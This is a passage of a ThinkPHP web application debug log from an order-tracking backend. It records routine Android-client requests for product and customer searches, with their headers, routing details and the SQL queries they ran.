LIKE '%%' ORDER BY `createtime` DESC LIMIT 0,15 [ RunTime:0.000520s ] --------------------------------------------------------------- [ 2022-07-20T17:14:39+08:00 ] 106.112.205.110 POST /api/office/product/getproductbywords?userId=100&keywords=&offset=0&pageNum=10&isAdd=0&faProductId=0 [ info ] 47.105.33.115:8081/api/office/product/getproductbywords?userId=100&keywords=&offset=0&pageNum=10&isAdd=0&faProductId=0 [运行时间:0.044088s][吞吐率:22.68req/s] [内存消耗:4,452.28kb] [文件加载:73] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000075s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001315s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.product', 2 => 'getproductbywords', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '', 'offset' => '0', 'pageNum' => '10', 'isAdd' => '0', 'faProductId' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001631s ] [ info ] [ RUN ] app\api\controller\office\Product->getproductbywords[ /alidata/www/gendan/application/api/controller/office/Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000475s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001516s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000349s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001397s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE ( 1=1 ) AND `factorymge_id` = 40 AND ( `name` LIKE '%%' OR `product_num` LIKE '%%' ) AND `product_status` = '1' ORDER BY kucun asc LIMIT 0,10 [ RunTime:0.001208s ] --------------------------------------------------------------- [ 2022-07-20T17:14:39+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.028661s][吞吐率:34.89req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001664s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:39+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030526s][吞吐率:32.76req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001195s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001608s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000114s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:40+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.031096s][吞吐率:32.16req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000059s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001653s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001619s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:44+08:00 ] 106.112.205.110 POST /api/kehu/getkehubykeyword?staff_id=100&keyword=&offset=0&pageNum=15 [ info ] 47.105.33.115:8081/api/kehu/getkehubykeyword?staff_id=100&keyword=&offset=0&pageNum=15 [运行时间:0.045094s][吞吐率:22.18req/s] [内存消耗:4,570.65kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001063s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kehu', 2 => 'getkehubykeyword', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '100', 'keyword' => '', 'offset' => '0', 'pageNum' => '15', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001669s ] [ info ] [ RUN ] app\api\controller\Kehu->getkehubykeyword[ /alidata/www/gendan/application/api/controller/Kehu.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000414s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001441s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001036s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '100' LIMIT 1 [ RunTime:0.000392s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001088s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `factorymge_id` = 40 AND `normalstatus` = '1' AND `name` LIKE '%%' ORDER BY `createtime` DESC LIMIT 0,15 [ RunTime:0.000617s ] --------------------------------------------------------------- [ 2022-07-20T17:14:47+08:00 ] 106.112.205.110 POST /api/office/product/getproductbywords?userId=100&keywords=&offset=0&pageNum=10&isAdd=0&faProductId=0 [ info ] 47.105.33.115:8081/api/office/product/getproductbywords?userId=100&keywords=&offset=0&pageNum=10&isAdd=0&faProductId=0 [运行时间:0.044519s][吞吐率:22.46req/s] [内存消耗:4,452.28kb] [文件加载:73] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001194s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.product', 2 => 'getproductbywords', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '', 'offset' => '0', 'pageNum' => '10', 'isAdd' => '0', 'faProductId' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001701s ] [ info ] [ RUN ] app\api\controller\office\Product->getproductbywords[ /alidata/www/gendan/application/api/controller/office/Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000599s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001557s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000487s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001267s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE ( 1=1 ) AND `factorymge_id` = 40 AND ( `name` LIKE '%%' OR `product_num` LIKE '%%' ) AND `product_status` = '1' ORDER BY kucun asc LIMIT 0,10 [ RunTime:0.000900s ] --------------------------------------------------------------- [ 2022-07-20T17:14:47+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.022525s][吞吐率:44.40req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001179s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:47+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030114s][吞吐率:33.21req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001432s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001596s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000093s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:48+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.029679s][吞吐率:33.69req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001322s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001626s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000108s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:49+08:00 ] 106.112.205.110 POST /api/office/product/getproductbywords?userId=100&keywords=%E8%B6%85%E8%96%84&offset=0&pageNum=10&isAdd=0&faProductId=0 [ info ] 47.105.33.115:8081/api/office/product/getproductbywords?userId=100&keywords=%E8%B6%85%E8%96%84&offset=0&pageNum=10&isAdd=0&faProductId=0 [运行时间:0.045121s][吞吐率:22.16req/s] [内存消耗:4,452.76kb] [文件加载:73] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001211s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.product', 2 => 'getproductbywords', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '超薄', 'offset' => '0', 'pageNum' => '10', 'isAdd' => '0', 'faProductId' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001678s ] [ info ] [ RUN ] app\api\controller\office\Product->getproductbywords[ /alidata/www/gendan/application/api/controller/office/Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000408s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001656s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000392s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001357s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE ( 1=1 ) AND `factorymge_id` = 40 AND ( `name` LIKE '%超薄%' OR `product_num` LIKE '%超薄%' ) AND `product_status` = '1' ORDER BY kucun asc LIMIT 0,10 [ RunTime:0.000841s ] --------------------------------------------------------------- [ 2022-07-20T17:14:49+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030397s][吞吐率:32.90req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001188s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001614s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000103s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:49+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020876s][吞吐率:47.90req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001100s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:50+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.029566s][吞吐率:33.82req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001247s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001698s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000095s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:52+08:00 ] 106.112.205.110 POST /api/office/product/getproductbywords?userId=100&keywords=%E8%B6%85%E8%96%841&offset=0&pageNum=10&isAdd=0&faProductId=0 [ info ] 47.105.33.115:8081/api/office/product/getproductbywords?userId=100&keywords=%E8%B6%85%E8%96%841&offset=0&pageNum=10&isAdd=0&faProductId=0 [运行时间:0.044651s][吞吐率:22.40req/s] [内存消耗:4,452.41kb] [文件加载:73] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001104s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.product', 2 => 'getproductbywords', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '超薄1', 'offset' => '0', 'pageNum' => '10', 'isAdd' => '0', 'faProductId' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001741s ] [ info ] [ RUN ] app\api\controller\office\Product->getproductbywords[ /alidata/www/gendan/application/api/controller/office/Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000550s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001511s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000417s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001386s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE ( 1=1 ) AND `factorymge_id` = 40 AND ( `name` LIKE '%超薄1%' OR `product_num` LIKE '%超薄1%' ) AND `product_status` = '1' ORDER BY kucun asc LIMIT 0,10 [ RunTime:0.001194s ] --------------------------------------------------------------- [ 2022-07-20T17:14:52+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.033008s][吞吐率:30.30req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001333s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001789s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000117s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:52+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021178s][吞吐率:47.22req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001152s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:52+08:00 ] 106.112.205.110 POST /api/office/product/getproductbywords?userId=100&keywords=%E8%B6%85%E8%96%8415&offset=0&pageNum=10&isAdd=0&faProductId=0 [ info ] 47.105.33.115:8081/api/office/product/getproductbywords?userId=100&keywords=%E8%B6%85%E8%96%8415&offset=0&pageNum=10&isAdd=0&faProductId=0 [运行时间:0.045265s][吞吐率:22.09req/s] [内存消耗:4,452.98kb] [文件加载:73] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001265s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.product', 2 => 'getproductbywords', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '超薄15', 'offset' => '0', 'pageNum' => '10', 'isAdd' => '0', 'faProductId' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001635s ] [ info ] [ RUN ] app\api\controller\office\Product->getproductbywords[ /alidata/www/gendan/application/api/controller/office/Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000548s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001473s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000385s ] [ sql ] [ 